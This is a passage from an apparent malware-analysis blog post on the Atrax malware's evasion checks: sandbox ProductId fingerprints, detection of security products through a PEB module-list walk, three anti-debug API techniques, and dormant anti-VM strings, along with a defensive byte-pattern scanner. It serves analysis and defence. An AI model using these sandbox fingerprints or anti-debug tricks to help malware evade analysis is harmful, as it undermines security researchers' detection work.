The second and third keys do not work due to updated sandboxes. These keys are some kind of signature that matches CWSandbox and JoeBox.

76487-644-3177037-23510: matches CWSandbox.

55274-640-2673064-23950: matches JoeBox.

CWSandbox and JoeBox now appear to be a single product, JoeSecurity, accessed through the URL http://file-analyzer.net/. JoeSecurity now automatically generates a new key for each run, making the two previously known keys obsolete. Strangely, though, the generated keys follow a recognizable pattern that is easy to detect. For example:

Windows XP:
78387-783-7838756-78387
89955-899-8995528-89955

Windows 7:
24752-247-2475255-24752
65168-651-6516896-65168

Funny fact: during our tests we had to submit our fingerprint executable several times to make sure the ProductId was unique at each run. This apparently did not please JoeSecurity, and our IP address was simply banned from the server.

The last two keys 76497-640-6308873-23835 and 76487-640-1464517-23259 are less common and seem to be related to old instances of Malwr sandbox. Today Malwr generates a unique key for each run with no identifiable pattern:

43587-502-6867763-42122
65925-308-4191880-45994
68959-300-3102090-30654
27323-986-4834729-34486
69978-592-8045283-75626

In addition, although Atrax does not implement it, it is possible to detect that an executable file has been uploaded to VirusTotal: the sandbox behind the “Behavioral information” section always has the same ProductId, 76487-341-0620571-22546.

As we can see, this technique is not really effective, for multiple reasons. First, it is easy for a sandbox to generate a new ProductId for each run; we edited the ProductId of a Windows 7 installation and Windows Update remained fully functional. Moreover, reading this registry value can itself be flagged as malicious behavior: it is not common for an executable file to look up the ProductId of the operating system.

Security products detection

Atrax also checksif security productshaveinjectedcode in therunning process of the malware.

To do this check, it uses a well-documented technics:

  • It finds the PEB (Process Environment Block) address (instruction mov eax, fs:0x30)
  • It looks for Ldr (LoaderData) in the PEB (instruction mov ecx, [eax+0x0C])
  • It finds the InLoadOrderLinks list, which contains all the modules loaded by the running process (instruction mov edi, [ecx+0x0C])
  • It walks InLoadOrderLinks and compares each entry to some values.


For more information about this method, see http://phrack.org/issues/65/10.html.

Atrax looks for the following loaded binary files to detect if a security product monitors the current application:

This technique is limited to a few security products and does not prevent detection by antivirus.

Anti Debug

Atrax uses three different techniques to check for the presence of a debugger.

ZwSetInformationThread

The first way to do it involves using the ZwSetInformationThread function.

NTSYSAPI NTSTATUS NTAPI ZwSetInformationThread(
IN HANDLE ThreadHandle,
IN THREADINFOCLASS ThreadInformationClass,
IN PVOID ThreadInformation,
IN ULONG ThreadInformationLength
);

When ThreadInformationClass is set to 0x11 (ThreadHideFromDebugger), any debugger becomes blind to actions performed by this thread.


ZwQueryInformationProcess

The second way to detect a debugger involves using ZwQueryInformationProcess.

NTSTATUS WINAPI ZwQueryInformationProcess(
_In_      HANDLE ProcessHandle,
_In_      PROCESSINFOCLASS ProcessInformationClass,
_Out_     PVOID ProcessInformation,
_In_      ULONG ProcessInformationLength,
_Out_opt_ PULONG ReturnLength
);


When ProcessInformationClass is set to 0x7 (ProcessDebugPort), ProcessInformation is set to -1 if the process is being debugged.


IsDebuggerPresent

Finally, Atrax uses the classic IsDebuggerPresent function call, which reads the BeingDebugged flag inside the PEB. If BeingDebugged equals 1, the process is being debugged.
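The PEB walk described under “Security products detection” and the BeingDebugged read that IsDebuggerPresent performs both start from the same instruction, mov eax, fs:[0x30]. As an added example (not the post's or Atrax's code), the Python scanner below looks for that 32-bit PEB read in a byte blob and classifies what follows it: a load of PEB.Ldr (+0x0C) followed by a load of the InLoadOrderLinks head (+0x0C) is reported as a module-list walk, and a byte read at PEB+0x02 as an inline BeingDebugged check. This generalises the post slightly, since Atrax calls IsDebuggerPresent rather than reading the flag inline. The opcode encodings are standard x86; the sample blob and the 32-byte search window are constructed assumptions.

```python
from typing import List, Optional, Tuple

# 32-bit x86 encodings of the instructions the post lists (constructed here).
PEB_READS = [
    bytes.fromhex("64A130000000"),    # mov eax, fs:[0x30]   (A1 moffs32 form)
    bytes.fromhex("648B0530000000"),  # mov eax, fs:[0x30]   (8B /r disp32 form)
]
LDR_LOAD = bytes.fromhex("8B480C")     # mov ecx, [eax+0x0C]  -> PEB.Ldr
INLOAD_LOAD = bytes.fromhex("8B790C")  # mov edi, [ecx+0x0C]  -> Ldr.InLoadOrderLinks
BEING_DEBUGGED_READS = [
    bytes.fromhex("0FB64002"),  # movzx eax, byte ptr [eax+0x02] -> PEB.BeingDebugged
    bytes.fromhex("8A4002"),    # mov al, byte ptr [eax+0x02]
]


def classify_after_peb_read(region: bytes) -> Optional[str]:
    """Decide what a PEB read is used for from the bytes that follow it."""
    ldr = region.find(LDR_LOAD)
    if ldr != -1 and region.find(INLOAD_LOAD, ldr + len(LDR_LOAD)) != -1:
        return "peb-ldr-walk"          # PEB -> Ldr -> InLoadOrderLinks
    if any(pattern in region for pattern in BEING_DEBUGGED_READS):
        return "peb-beingdebugged"     # inline equivalent of IsDebuggerPresent
    return None


def scan_peb_access(blob: bytes, window: int = 32) -> List[Tuple[int, str]]:
    """Return (offset, kind) for every PEB read whose following bytes match
    one of the two access patterns; window is how far ahead we look."""
    hits = []
    for peb_read in PEB_READS:
        start = 0
        while True:
            i = blob.find(peb_read, start)
            if i == -1:
                break
            region = blob[i + len(peb_read): i + len(peb_read) + window]
            kind = classify_after_peb_read(region)
            if kind is not None:
                hits.append((i, kind))
            start = i + 1
    return sorted(hits)


# Constructed sample: a module-list walk, an inline BeingDebugged read, and a
# decoy PEB read that is followed by a plain ret (should not be reported).
SAMPLE = (
    b"\x90" * 4
    + PEB_READS[0] + LDR_LOAD + INLOAD_LOAD          # walk starts at offset 4
    + b"\x90" * 8
    + PEB_READS[1] + BEING_DEBUGGED_READS[0]         # flag read at offset 24
    + b"\x90" * 8
    + PEB_READS[0] + b"\xC3"                         # decoy at offset 43
)

if __name__ == "__main__":
    for offset, kind in scan_peb_access(SAMPLE):
        print(f"0x{offset:04x}: {kind}")
```

A PEB read on its own is not evidence of anything: loader and runtime code reads the PEB too, and 64-bit code reaches it through gs:[0x60] instead, so an analyst would run this over the code section of a suspect 32-bit sample as a triage indicator and then confirm what the matched code compares the module names against.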

AntiVM

The malware's specifications mention VM detection. This functionality does not seem to be included in the sample we studied, but some significant strings can be found inside the binary file:

  • VMWare
  • VBOX
  • DiskVirtual_HD

It looks like some VM detection code is present, but static analysis showed that this part of the code is never called.

Conclusion

In this post we have seen that an effort was made to detect security products, but the detection of analysis environments is not really well implemented. One year after the malware's launch, it is fully detected by the sandboxes and the tricks used here are not effective. Yet a huge number of anti-debug, anti-VM and anti-analysis tricks are documented on the Internet; Atrax uses only the most basic tests.

For further information, please see:
http://waleedassar.blogspot.com
http://pferrie.host22.com/papers/antidebug.pdf